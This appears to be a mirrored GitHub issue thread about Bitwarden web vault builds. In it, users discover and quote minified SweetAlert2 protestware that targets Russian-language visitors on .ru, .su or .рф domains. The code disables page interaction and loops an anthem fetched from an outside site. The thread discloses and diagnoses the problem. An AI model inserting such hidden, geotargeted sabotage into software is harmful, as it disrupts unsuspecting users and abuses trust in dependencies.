Code Monkey home page Code Monkey logo

Comments (6)

DarkCat09 avatar DarkCat09 commented on May 25, 2024
$ grep -i -o -r 'ukraina.mp3' web-vault 
web-vault/app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
web-vault/app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3

from bw_web_builds.

DarkCat09 avatar DarkCat09 commented on May 25, 2024

Here is the code found with grep:

if("undefined"!=typeof window&
&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){var pi=new Date,mi=localStorage.getItem("swal-initiation");mi?(pi.getTime()-Date.parse(mi))/864e5>3&&setTimeout((function(){documen
t.body.style.pointerEvents="none";var e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((function(){e.play()
.catch((function(){}))}),2500)}),500)

Activates if browser language is Russian and web vault is hosted on RU or ะ ะค domain.

from bw_web_builds.

DarkCat09 avatar DarkCat09 commented on May 25, 2024

https://github.com/bitwarden/web/blob/master/package.json#L105C5-L105C31

from bw_web_builds.

DarkCat09 avatar DarkCat09 commented on May 25, 2024

Okay, it is sweetalert2 from the original Bitwarden's source code.
Could you do something with that?

from bw_web_builds.

doesnmisclown avatar doesnmisclown commented on May 25, 2024

Looks like SweetAlert2 protestware. You can rebuild with "safe" version of SweetAlert2,

from bw_web_builds.

BlackDex avatar BlackDex commented on May 25, 2024

Also, this is the wrong place to complain.
You need to go to https://github.com/bitwarden/clients

from bw_web_builds.

Related Issues (20)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.